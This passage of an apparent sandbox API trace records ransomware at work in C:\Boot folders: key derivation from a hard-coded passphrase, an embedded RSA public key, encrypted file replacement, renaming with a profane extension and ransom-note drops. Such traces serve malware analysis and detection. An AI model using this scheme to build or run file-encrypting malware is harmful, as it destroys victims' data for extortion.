lpSystemTimeAsFileTime=0x2c5f40c) [0127.093] GetLastError () returned 0x0 [0127.093] GetFileAttributesA (lpFileName="C:\\\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui")) returned 0x20 [0127.094] SetFileAttributesA (lpFileName="C:\\\\Boot\\fr-FR\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0127.094] CreateFileA (lpFileName="C:\\\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0127.094] CreateFileA (lpFileName="C:\\\\Boot\\fr-FR\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cd8 [0127.095] SetFileAttributesA (lpFileName="C:\\\\Boot\\fr-FR\\bootmgr.exe.mui.gsg", dwFileAttributes=0x2) returned 1 [0127.095] CryptAcquireContextA (in: phProv=0x2c5e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2c5e408*=0x27ed080) returned 1 [0127.097] CryptCreateHash (in: hProv=0x27ed080, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2c5e40c | out: phHash=0x2c5e40c) returned 1 [0127.097] lstrlenA (lpString="miyiMmnMTcbAzXSmrboOmHkozMlQm") returned 29 [0127.097] CryptHashData (hHash=0x69d428, pbData=0x5bcef8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0127.097] CryptDeriveKey (in: hProv=0x27ed080, Algid=0x6610, hBaseData=0x69d428, dwFlags=0x1000000, phKey=0x2c5e3f8 | out: phKey=0x2c5e3f8*=0x69d368) returned 1 [0127.097] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0127.097] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2c5e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0 | out: pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0) returned 1 [0127.097] CryptAcquireContextA (in: phProv=0x2c5e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2c5e404*=0x27ee428) returned 1 [0127.097] CryptImportPublicKeyInfo (in: hCryptProv=0x27ee428, dwCertEncodingType=0x1, pInfo=0x27dbd78*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27dbda8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27dbdb0*, PublicKey.cUnusedBits=0x0), phKey=0x2c5e3fc | out: phKey=0x2c5e3fc*=0x69dee8) returned 1 [0127.097] CryptEncrypt (in: hKey=0x69dee8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x80) returned 1 [0127.097] CryptEncrypt (in: hKey=0x69dee8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27eded8*, pdwDataLen=0x2c5e400*=0x18, dwBufLen=0x80 | out: pbData=0x27eded8*, pdwDataLen=0x2c5e400*=0x80) returned 1 [0127.097] WriteFile (in: hFile=0x5cd8, lpBuffer=0x27eded8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27eded8*, lpNumberOfBytesWritten=0x2c5e410*=0x80, lpOverlapped=0x0) returned 1 [0127.098] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2796778, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x2796778, lpNumberOfBytesRead=0x2c5e410*=0x0, lpOverlapped=0x0) returned 0 [0127.098] CryptEncrypt (in: hKey=0x69d368, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2796778*, pdwDataLen=0x2c5e410*=0x0, dwBufLen=0x400 | out: pbData=0x2796778*, pdwDataLen=0x2c5e410*=0x10) returned 1 [0127.098] WriteFile (in: hFile=0x5cd8, lpBuffer=0x2796778*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x2796778*, lpNumberOfBytesWritten=0x2c5e410*=0x10, lpOverlapped=0x0) returned 1 [0127.098] CloseHandle (hObject=0xffffffff) returned 1 [0127.098] CloseHandle (hObject=0x5cd8) returned 1 [0127.099] CopyFileA (lpExistingFileName="C:\\\\Boot\\fr-FR\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui"), bFailIfExists=0) returned 0 [0127.102] SetFileAttributesA (lpFileName="C:\\\\Boot\\fr-FR\\bootmgr.exe.mui", dwFileAttributes=0x0) returned 0 [0127.102] DeleteFileA (lpFileName="C:\\\\Boot\\fr-FR\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui.gsg")) returned 1 [0127.103] MoveFileA (lpExistingFileName="C:\\\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\fr-FR\\bootmgr.exe.mui.fuck" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui.fuck")) returned 0 [0127.103] CryptDestroyHash (hHash=0x69d428) returned 1 [0127.103] CryptDestroyKey (hKey=0x69d368) returned 1 [0127.103] CryptReleaseContext (hProv=0x27ed080, dwFlags=0x0) returned 1 [0127.103] FindNextFileA (in: hFindFile=0x69d328, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0127.103] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2c5f40c | out: lpSystemTimeAsFileTime=0x2c5f40c) [0127.103] GetLastError () returned 0x5 [0127.104] GetFileAttributesA (lpFileName="C:\\\\Boot\\fr-FR\\memtest.exe.mui" (normalized: "c:\\boot\\fr-fr\\memtest.exe.mui")) returned 0x20 [0127.104] SetFileAttributesA (lpFileName="C:\\\\Boot\\fr-FR\\memtest.exe.mui", dwFileAttributes=0x80) returned 0 [0127.104] CreateFileA (lpFileName="C:\\\\Boot\\fr-FR\\memtest.exe.mui" (normalized: "c:\\boot\\fr-fr\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0127.104] CreateFileA (lpFileName="C:\\\\Boot\\fr-FR\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\fr-fr\\memtest.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cd8 [0127.104] SetFileAttributesA (lpFileName="C:\\\\Boot\\fr-FR\\memtest.exe.mui.gsg", dwFileAttributes=0x2) returned 1 [0127.105] CryptAcquireContextA (in: phProv=0x2c5e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2c5e408*=0x27ed080) returned 1 [0127.107] CryptCreateHash (in: hProv=0x27ed080, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2c5e40c | out: phHash=0x2c5e40c) returned 1 [0127.107] lstrlenA (lpString="miyiMmnMTcbAzXSmrboOmHkozMlQm") returned 29 [0127.107] CryptHashData (hHash=0x69d6e8, pbData=0x5bcf70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0127.107] CryptDeriveKey (in: hProv=0x27ed080, Algid=0x6610, hBaseData=0x69d6e8, dwFlags=0x1000000, phKey=0x2c5e3f8 | out: phKey=0x2c5e3f8*=0x69d428) returned 1 [0127.107] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0127.107] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2c5e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0 | out: pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0) returned 1 [0127.107] CryptAcquireContextA (in: phProv=0x2c5e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2c5e404*=0x27ee3a0) returned 1 [0127.107] CryptImportPublicKeyInfo (in: hCryptProv=0x27ee3a0, dwCertEncodingType=0x1, pInfo=0x27dbbd8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27dbc08*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27dbc10*, PublicKey.cUnusedBits=0x0), phKey=0x2c5e3fc | out: phKey=0x2c5e3fc*=0x69dca8) returned 1 [0127.107] CryptEncrypt (in: hKey=0x69dca8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x80) returned 1 [0127.107] CryptEncrypt (in: hKey=0x69dca8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27eda10*, pdwDataLen=0x2c5e400*=0x18, dwBufLen=0x80 | out: pbData=0x27eda10*, pdwDataLen=0x2c5e400*=0x80) returned 1 [0127.108] WriteFile (in: hFile=0x5cd8, lpBuffer=0x27eda10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27eda10*, lpNumberOfBytesWritten=0x2c5e410*=0x80, lpOverlapped=0x0) returned 1 [0127.108] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2796778, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x2796778, lpNumberOfBytesRead=0x2c5e410*=0x0, lpOverlapped=0x0) returned 0 [0127.108] CryptEncrypt (in: hKey=0x69d428, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2796778*, pdwDataLen=0x2c5e410*=0x0, dwBufLen=0x400 | out: pbData=0x2796778*, pdwDataLen=0x2c5e410*=0x10) returned 1 [0127.108] WriteFile (in: hFile=0x5cd8, lpBuffer=0x2796778*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x2796778*, lpNumberOfBytesWritten=0x2c5e410*=0x10, lpOverlapped=0x0) returned 1 [0127.109] CloseHandle (hObject=0xffffffff) returned 1 [0127.109] CloseHandle (hObject=0x5cd8) returned 1 [0127.109] CopyFileA (lpExistingFileName="C:\\\\Boot\\fr-FR\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\fr-fr\\memtest.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\fr-FR\\memtest.exe.mui" (normalized: "c:\\boot\\fr-fr\\memtest.exe.mui"), bFailIfExists=0) returned 0 [0127.113] SetFileAttributesA (lpFileName="C:\\\\Boot\\fr-FR\\memtest.exe.mui", dwFileAttributes=0x0) returned 0 [0127.113] DeleteFileA (lpFileName="C:\\\\Boot\\fr-FR\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\fr-fr\\memtest.exe.mui.gsg")) returned 1 [0127.114] MoveFileA (lpExistingFileName="C:\\\\Boot\\fr-FR\\memtest.exe.mui" (normalized: "c:\\boot\\fr-fr\\memtest.exe.mui"), lpNewFileName="C:\\\\Boot\\fr-FR\\memtest.exe.mui.fuck" (normalized: "c:\\boot\\fr-fr\\memtest.exe.mui.fuck")) returned 0 [0127.114] CryptDestroyHash (hHash=0x69d6e8) returned 1 [0127.114] CryptDestroyKey (hKey=0x69d428) returned 1 [0127.114] CryptReleaseContext (hProv=0x27ed080, dwFlags=0x0) returned 1 [0127.114] FindNextFileA (in: hFindFile=0x69d328, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 0 [0127.114] FindClose (in: hFindFile=0x69d328 | out: hFindFile=0x69d328) returned 1 [0127.114] GetFileAttributesA (lpFileName="C:\\\\Boot\\fr-FR\\README_BACK_FILES.htm" (normalized: "c:\\boot\\fr-fr\\readme_back_files.htm")) returned 0xffffffff [0127.114] AreFileApisANSI () returned 1 [0127.114] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x66d408, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 37 [0127.114] CreateFileW (lpFileName="C:\\\\Boot\\fr-FR\\README_BACK_FILES.htm" (normalized: "c:\\boot\\fr-fr\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2c5f680, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cec [0127.116] GetFileType (hFile=0x5cec) returned 0x1 [0127.116] WriteFile (in: hFile=0x5cec, lpBuffer=0x2c5e2cc*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2c5e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2c5e2cc*, lpNumberOfBytesWritten=0x2c5e2c4*=0x5ec, lpOverlapped=0x0) returned 1 [0127.117] FindNextFileA (in: hFindFile=0x69d8e8, lpFindFileData=0x2c5f898 | out: lpFindFileData=0x2c5f898) returned 1 [0127.117] FindFirstFileA (in: lpFileName="C:\\\\Boot\\hr-HR\\*.*", lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 0x69d328 [0127.117] FindNextFileA (in: hFindFile=0x69d328, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0127.117] FindNextFileA (in: hFindFile=0x69d328, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0127.117] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2c5f40c | out: lpSystemTimeAsFileTime=0x2c5f40c) [0127.118] GetLastError () returned 0x0 [0127.118] GetFileAttributesA (lpFileName="C:\\\\Boot\\hr-HR\\bootmgr.exe.mui" (normalized: "c:\\boot\\hr-hr\\bootmgr.exe.mui")) returned 0x20 [0127.118] SetFileAttributesA (lpFileName="C:\\\\Boot\\hr-HR\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0127.118] CreateFileA (lpFileName="C:\\\\Boot\\hr-HR\\bootmgr.exe.mui" (normalized: "c:\\boot\\hr-hr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0127.118] CreateFileA (lpFileName="C:\\\\Boot\\hr-HR\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\hr-hr\\bootmgr.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cd8 [0127.118] SetFileAttributesA (lpFileName="C:\\\\Boot\\hr-HR\\bootmgr.exe.mui.gsg", dwFileAttributes=0x2) returned 1 [0127.119] CryptAcquireContextA (in: phProv=0x2c5e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2c5e408*=0x27ed080) returned 1 [0127.120] CryptCreateHash (in: hProv=0x27ed080, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2c5e40c | out: phHash=0x2c5e40c) returned 1 [0127.120] lstrlenA (lpString="miyiMmnMTcbAzXSmrboOmHkozMlQm") returned 29 [0127.120] CryptHashData (hHash=0x69d368, pbData=0x5bcf70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0127.120] CryptDeriveKey (in: hProv=0x27ed080, Algid=0x6610, hBaseData=0x69d368, dwFlags=0x1000000, phKey=0x2c5e3f8 | out: phKey=0x2c5e3f8*=0x69d428) returned 1 [0127.120] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0127.120] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2c5e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0 | out: pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0) returned 1 [0127.121] CryptAcquireContextA (in: phProv=0x2c5e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2c5e404*=0x27edb20) returned 1 [0127.121] CryptImportPublicKeyInfo (in: hCryptProv=0x27edb20, dwCertEncodingType=0x1, pInfo=0x27dbca8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27dbcd8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27dbce0*, PublicKey.cUnusedBits=0x0), phKey=0x2c5e3fc | out: phKey=0x2c5e3fc*=0x69dd68) returned 1 [0127.121] CryptEncrypt (in: hKey=0x69dd68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x80) returned 1 [0127.121] CryptEncrypt (in: hKey=0x69dd68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27ee0f8*, pdwDataLen=0x2c5e400*=0x18, dwBufLen=0x80 | out: pbData=0x27ee0f8*, pdwDataLen=0x2c5e400*=0x80) returned 1 [0127.121] WriteFile (in: hFile=0x5cd8, lpBuffer=0x27ee0f8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27ee0f8*, lpNumberOfBytesWritten=0x2c5e410*=0x80, lpOverlapped=0x0) returned 1 [0127.122] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2796778, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x2796778, lpNumberOfBytesRead=0x2c5e410*=0x0, lpOverlapped=0x0) returned 0 [0127.122] CryptEncrypt (in: hKey=0x69d428, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2796778*, pdwDataLen=0x2c5e410*=0x0, dwBufLen=0x400 | out: pbData=0x2796778*, pdwDataLen=0x2c5e410*=0x10) returned 1 [0127.122] WriteFile (in: hFile=0x5cd8, lpBuffer=0x2796778*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x2796778*, lpNumberOfBytesWritten=0x2c5e410*=0x10, lpOverlapped=0x0) returned 1 [0127.122] CloseHandle (hObject=0xffffffff) returned 1 [0127.122] CloseHandle (hObject=0x5cd8) returned 1 [0127.123] CopyFileA (lpExistingFileName="C:\\\\Boot\\hr-HR\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\hr-hr\\bootmgr.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\hr-HR\\bootmgr.exe.mui" (normalized: "c:\\boot\\hr-hr\\bootmgr.exe.mui"), bFailIfExists=0) returned 0 [0127.126] SetFileAttributesA (lpFileName="C:\\\\Boot\\hr-HR\\bootmgr.exe.mui", dwFileAttributes=0x0) returned 0 [0127.126] DeleteFileA (lpFileName="C:\\\\Boot\\hr-HR\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\hr-hr\\bootmgr.exe.mui.gsg")) returned 1 [0127.127] MoveFileA (lpExistingFileName="C:\\\\Boot\\hr-HR\\bootmgr.exe.mui" (normalized: "c:\\boot\\hr-hr\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\hr-HR\\bootmgr.exe.mui.fuck" (normalized: "c:\\boot\\hr-hr\\bootmgr.exe.mui.fuck")) returned 0 [0127.127] CryptDestroyHash (hHash=0x69d368) returned 1 [0127.128] CryptDestroyKey (hKey=0x69d428) returned 1 [0127.128] CryptReleaseContext (hProv=0x27ed080, dwFlags=0x0) returned 1 [0127.128] FindNextFileA (in: hFindFile=0x69d328, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 0 [0127.128] FindClose (in: hFindFile=0x69d328 | out: hFindFile=0x69d328) returned 1 [0127.128] GetFileAttributesA (lpFileName="C:\\\\Boot\\hr-HR\\README_BACK_FILES.htm" (normalized: "c:\\boot\\hr-hr\\readme_back_files.htm")) returned 0xffffffff [0127.128] AreFileApisANSI () returned 1 [0127.128] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x66d670, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 37 [0127.128] CreateFileW (lpFileName="C:\\\\Boot\\hr-HR\\README_BACK_FILES.htm" (normalized: "c:\\boot\\hr-hr\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2c5f680, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cec [0127.128] GetFileType (hFile=0x5cec) returned 0x1 [0127.128] WriteFile (in: hFile=0x5cec, lpBuffer=0x2c5e2cc*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2c5e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2c5e2cc*, lpNumberOfBytesWritten=0x2c5e2c4*=0x5ec, lpOverlapped=0x0) returned 1 [0127.129] FindNextFileA (in: hFindFile=0x69d8e8, lpFindFileData=0x2c5f898 | out: lpFindFileData=0x2c5f898) returned 1 [0127.129] FindFirstFileA (in: lpFileName="C:\\\\Boot\\hu-HU\\*.*", lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 0x69d328 [0127.129] FindNextFileA (in: hFindFile=0x69d328, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0127.129] FindNextFileA (in: hFindFile=0x69d328, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0127.129] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2c5f40c | out: lpSystemTimeAsFileTime=0x2c5f40c) [0127.129] GetLastError () returned 0x0 [0127.129] GetFileAttributesA (lpFileName="C:\\\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui")) returned 0x20 [0127.129] SetFileAttributesA (lpFileName="C:\\\\Boot\\hu-HU\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0127.130] CreateFileA (lpFileName="C:\\\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0127.130] CreateFileA (lpFileName="C:\\\\Boot\\hu-HU\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cd8 [0127.130] SetFileAttributesA (lpFileName="C:\\\\Boot\\hu-HU\\bootmgr.exe.mui.gsg", dwFileAttributes=0x2) returned 1 [0127.130] CryptAcquireContextA (in: phProv=0x2c5e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2c5e408*=0x27ed080) returned 1 [0127.132] CryptCreateHash (in: hProv=0x27ed080, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2c5e40c | out: phHash=0x2c5e40c) returned 1 [0127.132] lstrlenA (lpString="miyiMmnMTcbAzXSmrboOmHkozMlQm") returned 29 [0127.132] CryptHashData (hHash=0x69d428, pbData=0x5bcef8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0127.132] CryptDeriveKey (in: hProv=0x27ed080, Algid=0x6610, hBaseData=0x69d428, dwFlags=0x1000000, phKey=0x2c5e3f8 | out: phKey=0x2c5e3f8*=0x69d6e8) returned 1 [0127.132] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0127.132] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2c5e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0 | out: pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0) returned 1 [0127.132] CryptAcquireContextA (in: phProv=0x2c5e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2c5e404*=0x27ee4b0) returned 1 [0127.133] CryptImportPublicKeyInfo (in: hCryptProv=0x27ee4b0, dwCertEncodingType=0x1, pInfo=0x27dbf18*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27dbf48*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27dbf50*, PublicKey.cUnusedBits=0x0), phKey=0x2c5e3fc | out: phKey=0x2c5e3fc*=0x27ff618) returned 1 [0127.133] CryptEncrypt (in: hKey=0x27ff618, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x80) returned 1 [0127.133] CryptEncrypt (in: hKey=0x27ff618, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27edcb8*, pdwDataLen=0x2c5e400*=0x18, dwBufLen=0x80 | out: pbData=0x27edcb8*, pdwDataLen=0x2c5e400*=0x80) returned 1 [0127.133] WriteFile (in: hFile=0x5cd8, lpBuffer=0x27edcb8*, nNumberOfBytesToWrite=0x80, 